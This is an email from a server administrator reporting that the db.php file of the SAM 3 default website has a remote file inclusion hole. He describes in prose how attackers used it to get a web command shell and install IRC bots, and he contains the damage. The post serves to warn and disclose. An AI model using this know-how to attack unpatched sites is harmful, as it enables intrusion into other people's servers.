Just so everyone knows, this is not a theoretical vuln. My server was hacked 5 days ago (fortunately minimally) and a couple of eggdrop (IRC relay) programs installed along with some extraneous PHP files (baca.php). It was fairly easily detected and cleaned up, but I tracked it back to db.php which was being used. I renamed the file (which of course stopped the web site) and then cleaned up. The basic premise is that the common setting is passed a url of a site with a php text file. This file is parsed and run on the local system, displays a web page (in php) with a command line area. From there it's a simple matter of issuing ftp requests and installing web (php or perl) apps. User has access at the level that the web server is running at. This was a slightly modified version of the SAM 3 default site, so the exploit's been there for a while, but is now known and hackers are actively looking for it. Google is real helpful in that respect based on the referrer listing just before the hack.
Fortunately my firewall blocked most of what they were trying to do (IRC bot relay and spam generation triggered by the bot as I disallow IRC from all machines and SMTP is only available from the main server) Roy Pait >>> "James Henline" <[email protected]> 1/9/2008 9:36 AM >>> Please see the following news article for more information. http://www.spacialaudio.com/news/index.html?newsID=151
